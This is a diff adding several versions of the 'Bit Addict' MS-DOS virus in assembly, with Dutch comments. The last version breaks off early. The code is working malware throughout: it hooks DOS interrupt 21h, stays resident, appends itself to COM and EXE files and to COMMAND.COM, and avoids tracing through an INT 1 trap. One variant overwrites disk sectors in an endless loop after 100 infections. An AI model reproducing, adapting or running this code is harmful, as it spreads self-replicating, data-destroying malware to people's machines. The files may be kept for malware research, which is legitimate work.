00000000..1657a389 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict4.asm 
@@ -0,0 +1,224 @@ +code segment + org 0 + + call Virus + +Displacement equ $ + +SavedCode db 0cdh,020h,11 dup (090h) + +OldInt21 dd 0 +Count db 0 + +Jump db 0e9h +NearOfset dw 0 +ID db 'Bit Addict says: ',13,10 + db '"You have a good taste for hard disks, it was delicious!"' + db '$' + +NewInt21: + cmp ax,0ffffh + jne Ok + cmp dx,ax + jne Ok + mov ax,cs + iret +Ok: cmp ah,4bh + je Exec + jmp EOI + +Exec: cmp cs:Count,100 + jb Infect + + push cs + pop ds + mov ah,9 + lea dx,ID + int 21h + + xor dx,dx + cli +Repeat: push dx + mov ax,2 + xor bx,bx + mov cx,100 + int 26h + pop ax + pop dx + add dx,100 + jmp short Repeat + +Infect: push ax + push bx + push cx + push si + push di + push ds + push es + push dx + mov ax,04300h + int 21h + push cx + mov ax,04301h + xor cx,cx + int 21h + mov ax,03d02h + int 21h + jnc OpenOk + jmp Error +OpenOk: mov bx,ax + mov ax,05700h + int 21h + push cx + push dx + push cs + pop ds + push cs + pop es + mov ah,3fh + mov cx,13 + lea dx,SavedCode + int 21h + jc Close2 + lea si,ID + lea di,SavedCode[3] + mov cx,10 + cld + repe cmpsb + je Counter + cmp word ptr SavedCode,5a4dh + je Close2 + mov ax,04202h + xor cx,cx + xor dx,dx + int 21h + jc Close + or dx,dx + jne Close + sub ax,3 + jb Close + mov NearOfset,ax + mov Count,0 + mov ah,40h + mov cx,CodeSize + xor dx,dx + int 21h + jc Close + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + jc Close + mov ah,40h + mov cx,13 + lea dx,Jump + int 21h +Close2: jmp short Close +Counter:mov dx,word ptr SavedCode[1] + add dx,offset Count+3 + xor cx,cx + mov ax,4200h + int 21h + jc Close + push ax + push dx + mov ah,3fh + mov cx,1 + lea dx,Count + int 21h + pop cx + pop dx + jc Close + inc Count + mov ax,4200h + int 21h + jc Close + mov ah,40h + mov cx,1 + lea dx,Count + int 21h +Close: pop dx + pop cx + mov ax,05701h + int 21h + mov ax,03e00h + int 21h +Error: pop cx + pop dx + pop es + pop ds + mov ax,04301h + int 21h + pop di + pop si + pop cx + pop bx + pop ax +EOI: jmp cs:OldInt21 + +Virus: mov 
ax,0ffffh + mov dx,ax + int 21h + pop bx + sub bx,Displacement + mov ds,ax + xor si,si + mov di,bx + mov cx,CodeSize + rep cmpsb + je Exit + push bx + mov ah,52h + int 21h + push es + push bx + mov ah,30h + int 21h + pop si + pop ds + pop bx + cmp al,2 + jb Exit + cmp al,3 + adc si,12h + les di,[si] + push es + push di + les di,es:[di] + mov [si],di + mov [si+2],es + pop ax + pop dx + add ax,0fh + mov cl,4 + shr ax,cl + add ax,dx + mov es,ax + push cs + pop ds + mov si,bx + xor di,di + mov cx,CodeSize + cld + rep movsb + xor ax,ax + mov ds,ax + mov ax,[84h] + mov es:word ptr OldInt21[0],ax + mov ax,[86h] + mov es:word ptr OldInt21[2],ax + mov word ptr [84h],NewInt21 + mov word ptr [86h],es +Exit: push cs + pop es + push cs + pop ds + lea si,SavedCode[bx] + mov di,0100h + push di + mov cx,13 + rep movsb + ret + +CodeSize equ $ + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict5.asm b/MSDOS/Virus.MSDOS.Unknown.addict5.asm new file mode 100644 index 00000000..377f7998 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict5.asm 
@@ -0,0 +1,530 @@ +; BIT ADDICT Versie 2.00 +; +; Dit virus besmet exe en com-files, en als het opgestart wordt dan reserveert +; hij 2 diskbuffers en copieert het virus daarheen om resident te blijven. +; Als het virus resident is dan gaat hij in de environment naar de comspec +; zoeken en besment dan de command interpreter (meestal COMMAND.COM). +; Om dit virus te assambleren moet je met TASM, of MASM een OBJ-file maken en +; dan linken naar een exe-file. Wees voorzichtig en veel plezier met dit virus. + +; p.s. wil je dit virus nog aan NIEMAND geven zonder mijn toestemming, omdat +; het virus nog niet helemaal af is, en waarschijnlijk ook niet helemaal zonder +; fouten. + +;----------------------------------------------------------------------------- +;----- ----- +;----- Macros en andere hulpmiddellen ----- +;----- ----- +;----------------------------------------------------------------------------- + +; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter +; wordt dan 128 bytes en er dus een foutmelding komt + +jmpc macro Dest ; vervanging voor jc + local @@00 + + jnc @@00 + jmp Dest +@@00: + endm + +jmpnc macro Dest ; vervanging voor jnc + local @@00 + + jc @@00 + jmp Dest +@@00: + endm + +jmpe macro Dest ; vervanging voor je + local @@00 + + jnz @@00 + jmp Dest +@@00: + endm + +jmpne macro Dest ; vervanging voor jne + local @@00 + + jz @@00 + jmp Dest +@@00: + endm + +eseg segment + mov ax,4c00h ; exit + int 21h +eseg ends + +;----------------------------------------------------------------------------- +;----- ----- +;----- Begin van het Bit Addict virus ----- +;----- ----- +;----------------------------------------------------------------------------- + +cseg segment + assume cs:cseg,ds:cseg,es:cseg + org 0 + +BeginCode equ $ +SavedCode equ this byte ; gegevens over het +OldSignature dw 5a4dh ; programma voor het virus +OldCSIP equ this dword +OldIP dw 0 +OldCS dw 0 +OldSP dw 200h +OldSS dw 0 + dw 3 dup(0) + +Comspec db 'COMSPEC=' ; 
comspec environment variabele + ; om de command.com te vinden +ID db 'BIT ADDICT 2.00' ; identificatie string +ID_Length equ $-offset ID + +Begin: push ax ; Programma om het virus + push bx ; in het geheugen te zetten + push cx + push dx + push si + push di + push ds + push es + push cs + pop ds + cmp OldSignature,5a4dh + je @@10 + mov si,offset SavedCode ; herstel begin van het + mov di,100h ; com-programma + mov cx,10h + cld + rep movsb + mov OldSS,ss ; bewaar de waarden van + mov OldSP,sp ; ss,sp,cs en ip + sub OldSP,10h + mov OldCS,es + mov OldIP,100h + jmp @@11 +@@10: mov ax,es ; bereken de waarden van + add ax,10h ; ss,sp,cs en ip + add OldCS,ax + add OldSS,ax +@@11: mov ax,4b40h ; controleer of Bit Addict al + int 21h ; in het geheugen aanwezig is + jc @@12 + mov ds,ax + push cs ; vergelijk identificatie + pop ds + mov si,offset ID + mov di,si + mov cx,ID_Length + cld + repe cmpsb + jmpne @@13 +@@12: mov ah,52h ; lees het adres van de eerste + int 21h ; disk-buffer + push bx + mov ah,30h + int 21h + pop di + cmp al,2 ; dit werkt niet op dos 1.x + jmpc @@13 + cmp al,3 ; voor dos 2.x op 13h en voor + adc di,12h ; dos 3+ op 12h + lds si,es:[di] + or si,si + jne @@13 + push di + movsw ; reserveer 1e buffer + movsw + pop di + mov cx,ds + mov dx,ds + call GetBuffer ; reserveer 2e buffer + jc @@13 + call CopyBitAddict ; Copieer bit addict naar + pop es ; de buffers + push es ; Infecteer bestand in de + call InfectComspec ; comspec + jmp @@14 +@@13: call RestoreBuffers +@@14: pop es ; ga nu verder met het + pop ds ; programma voor Bit Addict + pop di + pop si + pop dx + pop cx + pop bx + pop ax + cli + mov ss,cs:OldSS + mov sp,cs:OldSP + sti + jmp cs:OldCSIP + +GetBuffer: ; reserveer een buffer + push di ; cx = eerste buffer + push es ; dx = laatste buffer + jmp @@21 +@@20: push ds + pop es + mov di,si +@@21: lds si,es:[di] + or si,si + jne @@23 + mov ax,ds + sub ax,dx + cmp ax,21h + jne @@22 + mov dx,ds + movsw + movsw + clc + jmp @@24 +@@22: mov ax,ds + sub ax,cx 
+ neg ax + cmp ax,21h + jne @@20 + mov cx,ds + movsw + movsw + clc + jmp @@24 +@@23: stc +@@24: pop es + pop di + ret + +CopyBitAddict: + push cs ; copieer Bit Addict naar de + pop ds ; gereserveerde buffers + mov es,cx + xor si,si + xor di,di + mov cx,CodeSize1 + cld + rep movsb + mov ds,ax ; leid interrupt 21h om naar + mov ax,ds:[84h] ; Bit Addict + mov word ptr es:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr es:OldInt21[2],ax + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + ret + +InfectComspec: + mov es,es:[2ch] ; lees environment segment + xor di,di + push cs ; zoek naar de comspec + pop ds ; variabele + mov si,offset Comspec +@@30: push si + push di + mov cx,8 + cld + repe cmpsb + pop di + pop si + je @@31 + xor al,al + mov cx,-1 + cld + repne scasb + cmp byte ptr es:[di],0 + jne @@30 + jmp @@32 +@@31: push es ; infecteer de COMMAND.COM of + pop ds ; andere command interpreter + lea dx,[di+8] + push cs:OldIP + push cs:OldCS + push cs:OldSP + push cs:OldSS + call Infect + pop cs:OldSS + pop cs:OldSP + pop cs:OldCS + pop cs:OldIP +@@32: ret + +RestoreBuffers: + mov ax,cx +@@40: cmp ax,dx + je @@42 + mov ds,ax + add ax,21h + mov word ptr ds:[0],0 + mov word ptr ds:[2],ax + jmp @@40 +@@42: mov ds,dx + mov ax,es:[di] + mov ds:[0],ax + mov word ptr es:[di],0 + mov ax,es:[di+2] + mov ds:[2],ax + mov es:[di+2],cx + ret + +NewInt21: ; Het nieuwe interrupt 21h + pushf + cmp ax,4b40h + je InstallCheck + cmp ah,4bh + je Exec +EOI: popf + jmp cs:OldInt21 + +InstallCheck: ; Zo kan bit addict weten + mov ax,cs ; dat er al een andere copy + popf ; aanwezig is + clc + retf 2 + +ComHeader: ; dit stukje wordt voor een + mov ax,cs ; COM-file geplaatst + add ax,0100h +OldSize equ this word-2 + push ax + mov ax,offset Begin + push ax + retf + +Exec: call Infect ; functie 4bh, infecteer eerste + jmp EOI ; met Bit Addict + +Infect: push ax ; Infecteer een file + push bx + push cx + push si + push di + push bp + push es + mov ax,4300h ; lees attributen en 
bewaar + int 21h ; ze + jmpc @@62 + push cx + push dx + push ds + test cx,1 + jz @@51 + mov ax,4301h ; set Read-Only attribuut + and cx,0fffeh ; op nul + int 21h + jmpc @@61 +@@51: mov ax,3d02h ; open de file + int 21h + jmpc @@61 + mov bx,ax + mov ax,5700h ; lees de datum en tijd en + int 21h ; bewaar ze + jmpc @@60 + push cx + push dx + push cs ; ds=es=cs + pop ds + push cs + pop es + mov ah,3fh ; lees de header van de file + mov cx,HeaderLength + lea dx,Header + int 21h + jmpc @@59 + cmp ax,HeaderLength + jne @@54 + cmp Signature,5a4dh + jne @@52 + mov ax,ExeCS ; zoek de plaats waar de + add ax,HeaderSize ; identificatie zou moeten + mov dx,10h ; staan voor exe-files + mul dx + add ax,offset ID + adc dx,0 + jmp @@53 +@@52: mov ax,ComCS ; doe hetzelfde maar dan voor + mov dx,10h ; een com-file + sub ax,dx + mul dx + add ax,offset ID + adc dx,0 +@@53: mov cx,dx + mov dx,ax + mov ax,4200h + int 21h + mov ah,3fh ; lees de ID indien aanwezig + mov cx,ID_Length + lea dx,ID_Check + int 21h + lea si,ID_Check ; controleer of ID aanwezig + lea di,ID ; is + mov cx,ID_Length + cld + repe cmpsb + jmpe @@59 ; als ID aanwezig is, stop dan + cmp Signature,5a4dh + je @@56 +@@54: mov ax,4202h ; infecteer com-files + xor cx,cx ; ga naar het einde van de file + xor dx,dx + int 21h + mov cx,10h ; aanpassen van de com-header + div cx ; aan deze com-file + or dx,dx + je @@55 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + int 21h + pop ax + jmpc @@59 + inc ax +@@55: add ax,10h + mov OldSize,ax + mov si,offset Header ; bewaar het eerste deel van + mov di,offset SavedCode ; het programma + mov cx,10h + cld + rep movsb + mov ah,40h ; schrijf het virus achter het + mov cx,CodeSize1 ; programma + xor dx,dx + int 21h + jmpc @@59 + mov ax,4200h ; ga naar het begin van de file + xor cx,cx + xor dx,dx + int 21h + jmpc @@59 + mov ah,40h ; overschrijf het begin van het + mov cx,10h ; programma met de com-header + mov dx,offset ComHeader + int 21h + jmp @@59 +@@56: mov 
OldSignature,5a4dh ; infecteer exe-files + mov ax,ExeIP ; bewaar de oude waarden van + mov OldIP,ax ; cs:ip en ss:sp + mov ax,ExeCS + mov OldCS,ax + mov ax,ExeSP + mov OldSP,ax + mov ax,ExeSS + mov OldSS,ax + mov ax,PageCount ; pas de waarden van cs:ip en + dec ax ; ss:sp aan, en pas ook de + mov cx,200h ; lengte van de file aan + mul cx + add ax,PartPage + adc dx,0 + mov cx,dx + mov dx,ax + mov ax,4200h + int 21h + mov cx,10h + div cx + or dx,dx + je @@57 + push ax + push dx + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + int 21h + pop dx + pop ax + jc @@59 + inc ax +@@57: sub ax,HeaderSize + mov ExeCS,ax + mov ExeIP,offset Begin + add ax,CodeSizePara2 + mov ExeSS,ax + mov ExeSP,200h + mov ax,MinMem + cmp ax,20h+CodeSizePara2-CodeSizePara1 + jae @@58 + mov ax,20h +@@58: mov MinMem,ax + mov ax,PartPage + add ax,CodeSize1 + add ax,dx + mov cx,200h + xor dx,dx + div cx + add PageCount,ax + mov PartPage,dx + mov ah,40h ; schrijf het virus achter + mov cx,CodeSize1 ; de exe-file, indien de + xor dx,dx ; exe-file overlays bevat dan + int 21h ; worden ze overschreven en is + jc @@59 ; de exe-file onherstelbaar + mov ax,4200h ; beschadigd + xor cx,cx + xor dx,dx ; ga naar het begin van de file + int 21h + jc @@59 + mov ah,40h ; schrijf de nieuwe exe-header + mov cx,HeaderLength ; over de oude heen. + mov dx,offset Header + int 21h +@@59: pop dx ; herstel de datum van de file + pop cx + mov ax,5701h + int 21h +@@60: mov ah,3eh ; sluit de file + int 21h +@@61: pop ds ; herstel de attributen van de + pop dx ; file + pop cx + test cx,1 + jz @@62 + mov ax,4301h + int 21h +@@62: pop es ; herstel de waarden van de + pop bp ; registers en keer terug + pop di ; naar het oude interrupt 21 + pop si + pop cx + pop bx + pop ax + ret + +CodeSize1 equ $-BeginCode +CodeSizePara1 equ ($-BeginCode+0fh) / 10h + +Header dw 14h dup(?) 
+ComCS equ Header[ComHeader-OldSize] ; Com file
+
+Signature equ Header[0h] ; Exe file
+PartPage equ Header[2h]
+PageCount equ Header[4h]
+ReloCount equ Header[6h]
+HeaderSize equ Header[8h]
+MinMem equ Header[0ah]
+MaxMem equ Header[0ch]
+ExeSS equ Header[0eh]
+ExeSP equ Header[10h]
+ChkSum equ Header[12h]
+ExeIP equ Header[14h]
+ExeCS equ Header[16h]
+TablOfs equ Header[18h]
+OverlayNr equ Header[1ah]
+HeaderLength equ 1ch
+
+ID_Check db ID_Length dup(?)
+
+OldInt21 dd ?
+
+CodeSize2 equ $-BeginCode
+CodeSizePara2 equ ($-BeginCode+0fh) / 10h
+
+cseg ends
+
+sseg segment stack
+ db 200h dup(?)
+sseg ends
+
+end Begin
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.addict6.asm b/MSDOS/Virus.MSDOS.Unknown.addict6.asm
new file mode 100644
index 00000000..0535d7eb
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.addict6.asm
@@ -0,0 +1,612 @@ +; BIT ADDICT Versie 2.10 + +;----------------------------------------------------------------------------- +;----- ----- +;----- Macros en andere hulpmiddellen ----- +;----- ----- +;----------------------------------------------------------------------------- + +; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter +; wordt dan 128 bytes en er dus een foutmelding komt + +jmpc macro Dest ; vervanging voor jc + local @@00 + + jnc @@00 + jmp Dest +@@00: + endm + +jmpnc macro Dest ; vervanging voor jnc + local @@00 + + jc @@00 + jmp Dest +@@00: + endm + +jmpe macro Dest ; vervanging voor je + local @@00 + + jnz @@00 + jmp Dest +@@00: + endm + +jmpne macro Dest ; vervanging voor jne + local @@00 + + jz @@00 + jmp Dest +@@00: + endm + +eseg segment + mov ax,4c00h ; exit + int 21h +eseg ends + +;----------------------------------------------------------------------------- +;----- ----- +;----- Begin van het Bit Addict virus ----- +;----- ----- +;----------------------------------------------------------------------------- + +cseg segment + assume cs:cseg,ds:cseg,es:cseg + org 0 + +BeginCode equ $ +SavedCode equ this byte ; gegevens over het +OldSignature dw 5a4dh ; programma voor het virus +OldCSIP equ this dword +OldIP dw 0 +OldCS dw 0 +OldSP dw 200h +OldSS dw 0 + dw 3 dup(0) + +Comspec db 'COMSPEC=' ; comspec environment variabele + ; om de command.com te vinden +ID db 'BIT ADDICT 2.10' ; identificatie string +ID_Length equ $-offset ID + +Begin: push ax ; Programma om het virus + push bx ; in het geheugen te zetten + push cx + push dx + push si + push di + push ds + push es + call Init + jnc @@11 + call DebugOn + mov ah,52h ; lees het adres van de eerste + call DOS ; disk-buffer + push bx + mov ah,30h + call DOS + pop di + call DebugOff + cmp al,2 ; dit werkt niet op dos 1.x + jb @@11 + cmp al,3 ; voor dos 2.x op di+13h en + adc di,12h ; voor dos 3+ op di+12h + lds si,es:[di] + or si,si + jne @@11 + push di + movsw ; reserveer 
1e buffer + movsw + pop di + mov cx,ds + mov dx,ds + call GetBuffer ; reserveer 2e buffer + jc @@10 + call GetBuffer ; reserveer 3e buffer + jc @@10 + call CopyBitAddict ; Copieer bit addict naar + pop es ; de buffers + push es ; Infecteer bestand in de + call InfectComspec ; comspec + jmp @@11 +@@10: call RestoreBuffers +@@11: pop es ; ga nu verder met het + pop ds ; programma voor Bit Addict + pop di + pop si + pop dx + pop cx + pop bx + pop ax + cli + mov ss,cs:OldSS + mov sp,cs:OldSP + sti + jmp cs:OldCSIP + +GetBuffer: ; reserveer een buffer + push di ; cx = eerste buffer + push es ; dx = laatste buffer + jmp @@21 +@@20: push ds + pop es + mov di,si +@@21: lds si,es:[di] + or si,si + jne @@23 + mov ax,ds + sub ax,dx + cmp ax,21h + jne @@22 + mov dx,ds + movsw + movsw + clc + jmp @@24 +@@22: mov ax,ds + sub ax,cx + neg ax + cmp ax,21h + jne @@20 + mov cx,ds + movsw + movsw + clc + jmp @@24 +@@23: stc +@@24: pop es + pop di + ret + +CopyBitAddict: + push cs ; copieer Bit Addict naar de + pop ds ; gereserveerde buffers + mov es,cx + xor si,si + xor di,di + mov cx,CodeSize2 + cld + rep movsb + xor ax,ax ; leid interrupt 21h om naar + mov ds,ax ; Bit Addict + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + ret + +InfectComspec: + mov es,es:[2ch] ; lees environment segment + xor di,di + push cs ; zoek naar de comspec + pop ds ; variabele + mov si,offset Comspec +@@30: push si + push di + mov cx,8 + cld + repe cmpsb + pop di + pop si + je @@31 + xor al,al + mov cx,-1 + cld + repne scasb + cmp byte ptr es:[di],0 + jne @@30 + jmp @@32 +@@31: push es ; infecteer de COMMAND.COM of + pop ds ; andere command interpreter + lea dx,[di+8] + push cs:OldIP + push cs:OldCS + push cs:OldSP + push cs:OldSS + call Infect + pop cs:OldSS + pop cs:OldSP + pop cs:OldCS + pop cs:OldIP +@@32: ret + +RestoreBuffers: + mov ax,cx +@@40: cmp ax,dx + je @@42 + mov ds,ax + add ax,21h + mov word ptr ds:[0],0 + mov word ptr ds:[2],ax + jmp @@40 +@@42: mov ds,dx + mov 
ax,es:[di] + mov ds:[0],ax + mov word ptr es:[di],0 + mov ax,es:[di+2] + mov ds:[2],ax + mov es:[di+2],cx + ret + +DebugOn:push ax + push ds + xor ax,ax + mov ds,ax + cli + mov ax,ds:[4h] + mov word ptr cs:OldInt1[0],ax + mov ax,ds:[6h] + mov word ptr cs:OldInt1[2],ax + mov word ptr ds:[4],offset NewInt1 + mov word ptr ds:[6],cs + mov ax,ds:[84h] + mov word ptr cs:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr cs:OldInt21[2],ax + mov word ptr cs:DosInt21[0],0 + mov word ptr cs:DosInt21[2],0 + sti + pop ds + pop ax + pushf + push cs + call SetTrap + ret + +SetTrap:push bp + mov bp,sp + or word ptr ss:[bp+6],100h + pop bp + iret + +DebugOff: + pushf + push cs + call ClearTrap + push ax + push ds + xor ax,ax + mov ds,ax + cli + mov ax,word ptr cs:OldInt1[0] + mov ds:[4],ax + mov ax,word ptr cs:OldInt1[2] + mov ds:[6],ax + sti + pop ds + pop ax + ret + +ClearTrap: + push bp + mov bp,sp + and word ptr ss:[bp+6],0feffh + pop bp + iret + +Init: push cs + pop ds + cmp OldSignature,5a4dh + je @@50 + mov si,offset SavedCode ; herstel begin van het + mov di,100h ; com-programma + mov cx,10h + cld + rep movsb + mov OldSS,ss ; bewaar de waarden van + mov OldSP,sp ; ss,sp,cs en ip + sub OldSP,10h + mov OldCS,es + mov OldIP,100h + jmp @@51 +@@50: mov ax,es ; bereken de waarden van + add ax,10h ; ss,sp,cs en ip + add OldCS,ax + add OldSS,ax +@@51: mov ax,4b40h ; controleer of Bit Addict al + int 21h ; in het geheugen aanwezig is + jc @@52 + mov ds,ax + push cs ; vergelijk identificatie + pop ds + mov si,offset ID + mov di,si + mov cx,ID_Length + cld + repe cmpsb + je @@52 + stc +@@52: ret + +NewInt1:push bp + mov bp,sp + push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + jnz @@60 + cmp word ptr ss:[bp+4],300h + jae @@61 + mov ax,ss:[bp+2] + mov word ptr cs:DosInt21[0],ax + mov ax,ss:[bp+4] + mov word ptr cs:DosInt21[2],ax +@@60: and word ptr ss:[bp+6],0feffh +@@61: pop ax + pop bp + iret + +DOS: push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr 
cs:DosInt21[2] + pop ax + jnz @@62 + pushf + call cs:OldInt21 + ret +@@62: pushf + call cs:DosInt21 + ret + +NewInt21: ; Het nieuwe interrupt 21h + pushf + cmp ax,4b40h + je InstallCheck + cmp ah,4bh + je Exec +EOI: popf + jmp cs:OldInt21 + +InstallCheck: ; Zo kan bit addict weten + mov ax,cs ; dat er al een andere copy + popf ; aanwezig is + clc + retf 2 + +ComHeader: ; dit stukje wordt voor een + mov ax,cs ; COM-file geplaatst + add ax,0100h +OldSize equ this word-2 + push ax + mov ax,offset Begin + push ax + retf + +Exec: call Infect ; functie 4bh, infecteer eerste + jmp EOI ; met Bit Addict + +Infect: push ax ; Infecteer een file + push bx + push cx + push si + push di + push bp + push es + mov ax,4300h ; lees attributen en bewaar + call DOS ; ze + jmpc @@82 + push cx + push dx + push ds + test cx,1 + jz @@71 + mov ax,4301h ; set Read-Only attribuut + and cx,0fffeh ; op nul + call DOS + jmpc @@81 +@@71: mov ax,3d02h ; open de file + call DOS + jmpc @@81 + mov bx,ax + mov ax,5700h ; lees de datum en tijd en + call DOS ; bewaar ze + jmpc @@80 + push cx + push dx + push cs ; ds=es=cs + pop ds + push cs + pop es + mov ah,3fh ; lees de header van de file + mov cx,HeaderLength + lea dx,Header + call DOS + jmpc @@79 + cmp ax,HeaderLength + jne @@74 + cmp Signature,5a4dh + jne @@72 + mov ax,ExeCS ; zoek de plaats waar de + add ax,HeaderSize ; identificatie zou moeten + mov dx,10h ; staan voor exe-files + mul dx + add ax,offset ID + adc dx,0 + jmp @@73 +@@72: mov ax,ComCS ; doe hetzelfde maar dan voor + mov dx,10h ; een com-file + sub ax,dx + mul dx + add ax,offset ID + adc dx,0 +@@73: mov cx,dx + mov dx,ax + mov ax,4200h + call DOS + mov ah,3fh ; lees de ID indien aanwezig + mov cx,ID_Length + lea dx,ID_Check + call DOS + lea si,ID_Check ; controleer of ID aanwezig + lea di,ID ; is + mov cx,ID_Length + cld + repe cmpsb + jmpe @@79 ; als ID aanwezig is, stop dan + cmp Signature,5a4dh + je @@76 +@@74: mov ax,4202h ; infecteer com-files + xor cx,cx ; ga naar het einde van 
de file
+ xor dx,dx
+ call DOS
+ mov cx,10h ; aanpassen van de com-header
+ div cx ; aan deze com-file
+ or dx,dx
+ je @@75
+ push ax
+ mov ah,40h
+ mov cx,10h
+ sub cx,dx
+ xor dx,dx
+ call DOS
+ pop ax
+ jmpc @@79
+ inc ax
+@@75: add ax,10h
+ mov OldSize,ax
+ mov si,offset Header ; bewaar het eerste deel van
+ mov di,offset SavedCode ; het programma
+ mov cx,10h
+ cld
+ rep movsb
+ mov ah,40h ; schrijf het virus achter het
+ mov cx,CodeSize1 ; programma
+ xor dx,dx
+ call DOS
+ jmpc @@79
+ mov ax,4200h ; ga naar het begin van de file
+ xor cx,cx
+ xor dx,dx
+ call DOS
+ jmpc @@79
+ mov ah,40h ; overschrijf het begin van het
+ mov cx,10h ; programma met de com-header
+ mov dx,offset ComHeader
+ call DOS
+ jmp @@79
+@@76: mov OldSignature,5a4dh ; infecteer exe-files
+ mov ax,ExeIP ; bewaar de oude waarden van
+ mov OldIP,ax ; cs:ip en ss:sp
+ mov ax,ExeCS
+ mov OldCS,ax
+ mov ax,ExeSP
+ mov OldSP,ax
+ mov ax,ExeSS
+ mov OldSS,ax
+ mov ax,PageCount ; pas de waarden van cs:ip en
+ dec ax ; ss:sp aan, en pas ook de
+ mov cx,200h ; lengte van de file aan
+ mul cx
+ add ax,PartPage
+ adc dx,0
+ mov cx,dx
+ mov dx,ax
+ mov ax,4200h
+ call DOS
+ mov cx,10h
+ div cx
+ or dx,dx
+ je @@77
+ push ax
+ push dx
+ mov ah,40h
+ mov cx,10h
+ sub cx,dx
+ xor dx,dx
+ call DOS
+ pop dx
+ pop ax
+ jc @@79
+ inc ax
+@@77: sub ax,HeaderSize
+ mov ExeCS,ax
+ mov ExeIP,offset Begin
+ add ax,CodeSizePara2
+ mov ExeSS,ax
+ mov ExeSP,200h
+ mov ax,MinMem
+ cmp ax,20h+CodeSizePara2-CodeSizePara1
+ jae @@78
+ mov ax,20h
+@@78: mov MinMem,ax
+ mov ax,PartPage
+ add ax,CodeSize1
+ add ax,dx
+ mov cx,200h
+ xor dx,dx
+ div cx
+ add PageCount,ax
+ mov PartPage,dx
+ mov ah,40h ; schrijf het virus achter
+ mov cx,CodeSize1 ; de exe-file, indien de
+ xor dx,dx ; exe-file overlays bevat dan
+ call DOS ; worden ze overschreven en is
+ jc @@79 ; de exe-file onherstelbaar
+ mov ax,4200h ; beschadigd
+ xor cx,cx
+ xor dx,dx ; ga naar het begin van de file
+ call DOS
+ jc @@79
+ mov ah,40h ; schrijf de nieuwe exe-header
+ mov cx,HeaderLength ; over de oude heen.
+ mov dx,offset Header
+ call DOS
+@@79: pop dx ; herstel de datum van de file
+ pop cx
+ mov ax,5701h
+ call DOS
+@@80: mov ah,3eh ; sluit de file
+ call DOS
+@@81: pop ds ; herstel de attributen van de
+ pop dx ; file
+ pop cx
+ test cx,1
+ jz @@82
+ mov ax,4301h
+ call DOS
+@@82: pop es ; herstel de waarden van de
+ pop bp ; registers en keer terug
+ pop di ; naar het oude interrupt 21
+ pop si
+ pop cx
+ pop bx
+ pop ax
+ ret
+
+CodeSize1 equ $-BeginCode
+CodeSizePara1 equ ($-BeginCode+0fh) / 10h
+
+Header dw 14h dup(?)
+ComCS equ Header[ComHeader-OldSize] ; Com file
+
+Signature equ Header[0h] ; Exe file
+PartPage equ Header[2h]
+PageCount equ Header[4h]
+ReloCount equ Header[6h]
+HeaderSize equ Header[8h]
+MinMem equ Header[0ah]
+MaxMem equ Header[0ch]
+ExeSS equ Header[0eh]
+ExeSP equ Header[10h]
+ChkSum equ Header[12h]
+ExeIP equ Header[14h]
+ExeCS equ Header[16h]
+TablOfs equ Header[18h]
+OverlayNr equ Header[1ah]
+HeaderLength equ 1ch
+
+ID_Check db ID_Length dup(?)
+
+DosInt21 dd ?
+OldInt21 dd ?
+OldInt1 dd ?
+
+CodeSize2 equ $-BeginCode
+CodeSizePara2 equ ($-BeginCode+0fh) / 10h
+
+cseg ends
+
+sseg segment stack
+ db 200h dup(?)
+sseg ends
+
+end Begin
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.addict7.asm b/MSDOS/Virus.MSDOS.Unknown.addict7.asm
new file mode 100644
index 00000000..8c8e5563
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.addict7.asm
@@ -0,0 +1,813 @@
+; Bit Addict Versie 3
+
+;-----------------------------------------------------------------------------
+;----- -----
+;----- Macros en andere hulpmiddellen -----
+;----- -----
+;-----------------------------------------------------------------------------
+
+; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter
+; wordt dan 128 bytes en er dus een foutmelding komt
+
+jmpc macro Dest ; vervanging voor jc
+ local @@00
+
+ jnc @@00
+ jmp Dest
+@@00:
+ endm
+
+jmpnc macro Dest ; vervanging voor jnc
+ local @@00
+
+ jc @@00
+ jmp Dest
+@@00:
+ endm
+
+jmpe macro Dest ; vervanging voor je
+ local @@00
+
+ jnz @@00
+ jmp Dest
+@@00:
+ endm
+
+jmpne macro Dest ; vervanging voor jne
+ local @@00
+
+ jz @@00
+ jmp Dest
+@@00:
+ endm
+
+eseg segment
+ mov ax,4c00h ; exit
+ int 21h
+eseg ends
+
+;-----------------------------------------------------------------------------
+;----- -----
+;----- Begin van het Bit Addict virus -----
+;----- -----
+;-----------------------------------------------------------------------------
+
+cseg segment
+ assume cs:cseg,ds:cseg,es:cseg
+ org 0
+
+CodeSize equ CodeEnd-BeginCode
+CodeSizePara equ (CodeEnd-BeginCode+0fh) / 10h
+VirusSize equ VirusEnd-BeginCode
+VirusSizePara equ (VirusEnd-BeginCode+0fh) / 10h
+HeaderLength equ 18h
+
+BeginCode equ $
+SavedCode equ this byte ; gegevens over het
+OldSignature dw 5a4dh ; programma voor het virus
+OldCSIP equ this dword
+OldIP dw 0
+OldCS dw 0
+OldSP dw 200h
+OldSS dw 0
+ dw 3 dup(0)
+
+Comspec db 'COMSPEC=' ; comspec environment variabele
+ ; om de command.com te vinden
+
+ID db 'Bit Addict Version 3'
+ID_Length equ $-offset ID
+
+Count dw 0
+Bios db 10h dup(0)
+ChkSum dw 0
+
+Begin: push ax ; Programma om het virus
+ push bx ; in het geheugen te zetten
+ push cx
+ push dx
+ push si
+ push di
+ push ds
+ push es
+ call Init
+ jnc @@12
+ call BiosCheck
+ push cs
+ pop es
+ xor al,al
